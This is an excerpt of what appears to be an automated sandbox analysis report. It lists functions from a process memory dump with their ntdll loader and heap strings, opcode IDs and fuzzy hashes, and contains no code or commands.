                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • LdrpDynamicShimModule, xrefs: 010EA998
                                                                                                                                                                                  • apphelp.dll, xrefs: 010A2462
                                                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 010EA9A2
                                                                                                                                                                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 010EA992
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                  • API String ID: 0-176724104
                                                                                                                                                                                  • Opcode ID: 12af27a649529653b3a8eb47df40827dde2e2e14e52651114aaa274e6a13c36f
                                                                                                                                                                                  • Instruction ID: 5d5e77afc3d5dcc0cd6da5f23007c19374eb795a701f4ee1f1ccfc45b20f4c7f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 12af27a649529653b3a8eb47df40827dde2e2e14e52651114aaa274e6a13c36f
                                                                                                                                                                                  • Instruction Fuzzy Hash: EB312A75B10301EFDB399F9AD845AAEB7F5FB88714F160069E9A1AB345C7705881CB80
                                                                                                                                                                                  Function 010929A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • HEAP[%wZ]: , xrefs: 01093255
                                                                                                                                                                                  • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0109327D
                                                                                                                                                                                  • HEAP: , xrefs: 01093264
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                                                                                  • API String ID: 0-617086771
                                                                                                                                                                                  • Opcode ID: 94a6deed2b53922d4d349e97ec59ef140a1ce04f48915e7019f5239cab946f64
                                                                                                                                                                                  • Instruction ID: c3558662539bfd90d900e333a9deb6e868b3e177416a8371f007535a99096475
                                                                                                                                                                                  • Opcode Fuzzy Hash: 94a6deed2b53922d4d349e97ec59ef140a1ce04f48915e7019f5239cab946f64
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9992BC71A042499FDF65CFA8C4607AEBBF1FF48304F1880A9E899AB391D735A941DF50
                                                                                                                                                                                  Function 01090770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                  • API String ID: 0-4253913091
                                                                                                                                                                                  • Opcode ID: a301d8f8e93120640a1054b73cd440ca531f19871d9933f51e65f2768de7bc1d
                                                                                                                                                                                  • Instruction ID: 86943306984ce0330008b309e997c1bc06ae20c1553adac62872a34aa71da9de
                                                                                                                                                                                  • Opcode Fuzzy Hash: a301d8f8e93120640a1054b73cd440ca531f19871d9933f51e65f2768de7bc1d
                                                                                                                                                                                  • Instruction Fuzzy Hash: B4F1CC34B00606DFEB15CF69C8A4B6EB7F9FB45308F1485A8E4969B385D734E981CB90
                                                                                                                                                                                  Function 010A6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: $@
                                                                                                                                                                                  • API String ID: 0-1077428164
                                                                                                                                                                                  • Opcode ID: 3eaab2b434405b4f281c32c21a0b7b7914348906aa722836b19860806db2d87b
                                                                                                                                                                                  • Instruction ID: 093db1db17a2489455e67e58c94e5db114d1dbc07e77cfdbc7e1060e09124c9e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3eaab2b434405b4f281c32c21a0b7b7914348906aa722836b19860806db2d87b
                                                                                                                                                                                  • Instruction Fuzzy Hash: EBC2AC716083419FEB65CF69C880BABBBE5BF88704F44896DE9C987241D736D805CB92
                                                                                                                                                                                  Function 0107A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                                                                  • API String ID: 0-2779062949
                                                                                                                                                                                  • Opcode ID: fc86af84c85e8586beb8cc9a18335f7a7da49d1a4ef9bd1248b79559d2953a92
                                                                                                                                                                                  • Instruction ID: 6a833ef558fd94124f904367213ef3d920eceafcb7bf87f6e61da8895abe3392
                                                                                                                                                                                  • Opcode Fuzzy Hash: fc86af84c85e8586beb8cc9a18335f7a7da49d1a4ef9bd1248b79559d2953a92
                                                                                                                                                                                  • Instruction Fuzzy Hash: A4A179719012299BEB319F68CD88BEEB7B8FF44710F0041EAE949A7250DB359E85CF54
                                                                                                                                                                                  Function 010A0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 010EA121
                                                                                                                                                                                  • LdrpCheckModule, xrefs: 010EA117
                                                                                                                                                                                  • Failed to allocated memory for shimmed module list, xrefs: 010EA10F
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                  • API String ID: 0-161242083
                                                                                                                                                                                  • Opcode ID: 92917d899fa265aee025d4e75790662f9783ca0b0e8cd39ecc60b662058aed37
                                                                                                                                                                                  • Instruction ID: 08db7d06cfdefebd83b46db0fb1eb70ca0d9edf422a1739bd91638d0a49abbe3
                                                                                                                                                                                  • Opcode Fuzzy Hash: 92917d899fa265aee025d4e75790662f9783ca0b0e8cd39ecc60b662058aed37
                                                                                                                                                                                  • Instruction Fuzzy Hash: E671D170A00209DFDB29DFA9C984AEEB7F4FB48704F54406DE992AB315E734AD81CB50
                                                                                                                                                                                  Function 01090A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                  • API String ID: 0-1334570610
                                                                                                                                                                                  • Opcode ID: 0f4b811307c86a086b52f43a90840ce3321f80b81499e30cd00d815b22453dfd
                                                                                                                                                                                  • Instruction ID: b0c7426805acf6ea6b68c0baa1414684289f6dd3e1bcc4aca58efa37b7623786
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0f4b811307c86a086b52f43a90840ce3321f80b81499e30cd00d815b22453dfd
                                                                                                                                                                                  • Instruction Fuzzy Hash: D561DF30600301DFDB69CF28C854BAABBE5FF45708F14859AE4D98F28AD774E881CB90
                                                                                                                                                                                  Function 010BC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • Failed to reallocate the system dirs string !, xrefs: 010F82D7
                                                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 010F82E8
                                                                                                                                                                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 010F82DE
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                  • API String ID: 0-1783798831
                                                                                                                                                                                  • Opcode ID: f4765f5a409bd57eebf4ad2eb05be8c93be90930cce86655a1ea78067551067b
                                                                                                                                                                                  • Instruction ID: 7e2c0a8fa6af52a91cec71a4a37f92eeb378a3a2a6a226f82bf13429b0e57f0d
                                                                                                                                                                                  • Opcode Fuzzy Hash: f4765f5a409bd57eebf4ad2eb05be8c93be90930cce86655a1ea78067551067b
                                                                                                                                                                                  • Instruction Fuzzy Hash: AC4102B1544305ABE725EB68D984B9B77F8FF44620F00853AB9D4D7260E770E840CB91
                                                                                                                                                                                  Function 0113C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • PreferredUILanguages, xrefs: 0113C212
                                                                                                                                                                                  • @, xrefs: 0113C1F1
                                                                                                                                                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0113C1C5
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                                                                                  • API String ID: 0-2968386058
                                                                                                                                                                                  • Opcode ID: 90e2f6a4307ee013a1dd707466bb1975ee66a7051cb8fbeb0c3dcd0206907a59
                                                                                                                                                                                  • Instruction ID: 7ed3cff642500e619548674884fa71a64e6513ad317ceadd8e0c3c71d58677c0
                                                                                                                                                                                  • Opcode Fuzzy Hash: 90e2f6a4307ee013a1dd707466bb1975ee66a7051cb8fbeb0c3dcd0206907a59
                                                                                                                                                                                  • Instruction Fuzzy Hash: CE416372E00219EBDF15DBD8C851FEEBBB9AB94700F14406BEA49F7244D7749A448B90
                                                                                                                                                                                  Function 01114144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                                                                  • API String ID: 0-1373925480
                                                                                                                                                                                  • Opcode ID: ebbb40359bf29711be333766f4dea87bbee75a7005b5ce3c62413f68cf489cde
                                                                                                                                                                                  • Instruction ID: 2311db793bfb4142fe3cb5bb7f6940a0ad1542722bcd070725b8b640904ac47a
                                                                                                                                                                                  • Opcode Fuzzy Hash: ebbb40359bf29711be333766f4dea87bbee75a7005b5ce3c62413f68cf489cde
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D4126319002588BEB29DBE8D850BEDFBB4FF55B40F240469D941EFB85D7349941CB51
                                                                                                                                                                                  Function 01104755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 01104899
                                                                                                                                                                                  • LdrpCheckRedirection, xrefs: 0110488F
                                                                                                                                                                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01104888
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                  • API String ID: 0-3154609507
                                                                                                                                                                                  • Opcode ID: 1aeafb9705f1fe500ddad34e41707be17513f813cb9f594f26019274b6fde8f7
                                                                                                                                                                                  • Instruction ID: 5a52e15b4a822f0c851c6580f096f4fe4c07f05a4352f335ab0eb125d902d17c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1aeafb9705f1fe500ddad34e41707be17513f813cb9f594f26019274b6fde8f7
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5A41E732E04A519FDB2BDE9CD480A277BE4AF89650F06056EEF94D7B91D7B0D900CB81
                                                                                                                                                                                  Function 01090BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                  • API String ID: 0-2558761708
                                                                                                                                                                                  • Opcode ID: 56267823491266d20b5f77b8502f29cbabc95615d1991a4a999130ed99454fae
                                                                                                                                                                                  • Instruction ID: 580d0cd6fc5397740e9054e2df90196bb934fbd1d7adb282bb317bad14b4f780
                                                                                                                                                                                  • Opcode Fuzzy Hash: 56267823491266d20b5f77b8502f29cbabc95615d1991a4a999130ed99454fae
                                                                                                                                                                                  • Instruction Fuzzy Hash: B011E1713141429FDBA9DA1ACC68BBAB3E8EF40A1DF188569F486CB295DF30D840C754
                                                                                                                                                                                  Function 011020DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • LdrpInitializationFailure, xrefs: 011020FA
                                                                                                                                                                                  • Process initialization failed with status 0x%08lx, xrefs: 011020F3
                                                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 01102104
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                  • API String ID: 0-2986994758
                                                                                                                                                                                  • Opcode ID: e36516ee08f0e93e3462f62f6c20fd64ebdeb10beaaaaef3e5fa10fd53afad53
                                                                                                                                                                                  • Instruction ID: 08756b3918a5597afdabc437cc503ef25d3d892972a185f0d81ff81a5bf24c9c
                                                                                                                                                                                  • Opcode Fuzzy Hash: e36516ee08f0e93e3462f62f6c20fd64ebdeb10beaaaaef3e5fa10fd53afad53
                                                                                                                                                                                  • Instruction Fuzzy Hash: A8F0C235A40308AFE729E64CCC46F9A777DFB80B54F54006DFA90BB6C5D2F0A940CA91
                                                                                                                                                                                  Function 010903E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                                                  • String ID: #%u
                                                                                                                                                                                  • API String ID: 48624451-232158463
                                                                                                                                                                                  • Opcode ID: 958b5510094534fff56b8512c4aaabf2781f3c64e542fb803819e1e05017b94d
                                                                                                                                                                                  • Instruction ID: 9afe3e0313d30227efcf1a6d89d14c72217b6644e03342c6ed4cb346093a38a0
                                                                                                                                                                                  • Opcode Fuzzy Hash: 958b5510094534fff56b8512c4aaabf2781f3c64e542fb803819e1e05017b94d
                                                                                                                                                                                  • Instruction Fuzzy Hash: E57159B1A0014A9FDF05DFA9C994BAEB7F8BF08744F144069E945EB251EB34ED41CBA0
                                                                                                                                                                                  Function 0108A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • LdrResSearchResource Enter, xrefs: 0108AA13
                                                                                                                                                                                  • LdrResSearchResource Exit, xrefs: 0108AA25
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                                                                                  • API String ID: 0-4066393604
                                                                                                                                                                                  • Opcode ID: d4d39c9c965ebdff5d24e0f544aee9b5cf076e351eef98511da9d3bfb2ad8b14
                                                                                                                                                                                  • Instruction ID: c4541547bce1f1c44f8a5aada873e08f9ec77caa6bb7f0bb47a517475d063a52
                                                                                                                                                                                  • Opcode Fuzzy Hash: d4d39c9c965ebdff5d24e0f544aee9b5cf076e351eef98511da9d3bfb2ad8b14
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1FE19F71B08219DFEB22DE99C994BAEBBF9BF04310F10446AE9C1EBA51D734D940CB50
                                                                                                                                                                                  Function 0114A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: `$`
                                                                                                                                                                                  • API String ID: 0-197956300
                                                                                                                                                                                  • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                                                                  • Instruction ID: bc5b0cb449afaf569bdd199b49ecc3c1cbf71806bf0d39f183e9430fafe03e4d
                                                                                                                                                                                  • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                                                                  • Instruction Fuzzy Hash: 91C1E4312443429BEB29CF28D841B6BBBE5BFC4B18F094A2DF696CB290D775D505CB81
                                                                                                                                                                                  Function 010FE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID: Legacy$UEFI
                                                                                                                                                                                  • API String ID: 2994545307-634100481
                                                                                                                                                                                  • Opcode ID: fdd8acc944755868051bff270b22db93b3401db9dfc583eb4595a1972bad3d78
                                                                                                                                                                                  • Instruction ID: d77bb77303b75be1540ef3469cca5b711aefa2a73bb99ee9dbe14dabbb94fc76
                                                                                                                                                                                  • Opcode Fuzzy Hash: fdd8acc944755868051bff270b22db93b3401db9dfc583eb4595a1972bad3d78
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2F615B71E003099FDB24DFA8C841BAEBBF9FB48700F15406DE689EB6A1D731A901CB50
                                                                                                                                                                                  Function 011243D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: @$MUI
                                                                                                                                                                                  • API String ID: 0-17815947
                                                                                                                                                                                  • Opcode ID: fbac4ad2301095540eb6ea9e1d81c202bfdc7086792491405fc84e895c4479f5
                                                                                                                                                                                  • Instruction ID: 9a6be4c98b7038fd002ebfac5be9f1890484f8319e7371ab234bcc0f68f3e6a2
                                                                                                                                                                                  • Opcode Fuzzy Hash: fbac4ad2301095540eb6ea9e1d81c202bfdc7086792491405fc84e895c4479f5
                                                                                                                                                                                  • Instruction Fuzzy Hash: AB5128B1E0062EAEDF15DFA9CC90AEEBBB8EB44754F100529E651B7690D7309E05CB60
                                                                                                                                                                                  Function 010804E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0108063D
                                                                                                                                                                                  • kLsE, xrefs: 01080540
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                                                                  • API String ID: 0-2547482624
                                                                                                                                                                                  • Opcode ID: f1b59cc8a7f2d8239be7e3831e4e373ad45e6854c6e63175cb5a6d869b84a1ce
                                                                                                                                                                                  • Instruction ID: 6de1f93578c88da1cdb3a5d2323a350c1dafc5974bd77f648e5d2c699d4b2c87
                                                                                                                                                                                  • Opcode Fuzzy Hash: f1b59cc8a7f2d8239be7e3831e4e373ad45e6854c6e63175cb5a6d869b84a1ce
                                                                                                                                                                                  • Instruction Fuzzy Hash: E551AF716087468FD724EF68C4406A7BBE4AF88304F14883EFAE987245E7709549CBA1
                                                                                                                                                                                  Function 0108A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 0108A2FB
                                                                                                                                                                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 0108A309
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                                                                  • API String ID: 0-2876891731
                                                                                                                                                                                  • Opcode ID: 239f871bf3d5ebd001c2b92a3381d16e26e4c2a8816039eda13fce633c9cf5e8
                                                                                                                                                                                  • Instruction ID: 5c60fda5514f1f03659857959585de44759f838d0f1d09ede119d43bf19e4609
                                                                                                                                                                                  • Opcode Fuzzy Hash: 239f871bf3d5ebd001c2b92a3381d16e26e4c2a8816039eda13fce633c9cf5e8
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0341AC31B08659DFDB21AF69C844BAE7BF4BF84300F1480AAE9C0DB691E2B5D940CB40
                                                                                                                                                                                  Function 010BA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID: Cleanup Group$Threadpool!
                                                                                                                                                                                  • API String ID: 2994545307-4008356553
                                                                                                                                                                                  • Opcode ID: ff5709d9f493348a3d62d1648f0400a579a0a27149da18a802ce68fd3c6871c9
                                                                                                                                                                                  • Instruction ID: c237710e2e26f6dd59c5c8fc83f61aa2f66f377bb4a4022d248b3efc49236d11
                                                                                                                                                                                  • Opcode Fuzzy Hash: ff5709d9f493348a3d62d1648f0400a579a0a27149da18a802ce68fd3c6871c9
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7701D1B2240700EFE311DF14CD85B967BF8E798B15F008939B698CB290E734E904CB46
                                                                                                                                                                                  Function 0108C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: MUI
                                                                                                                                                                                  • API String ID: 0-1339004836
                                                                                                                                                                                  • Opcode ID: 3492b321fdf09443d858909c60ed13d90698de2ea342c1aa32ddd426bfbaca91
                                                                                                                                                                                  • Instruction ID: 554bf24e92704f14297cd6f20eef976463011498c21eca4112d00b9f7cb56b28
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3492b321fdf09443d858909c60ed13d90698de2ea342c1aa32ddd426bfbaca91
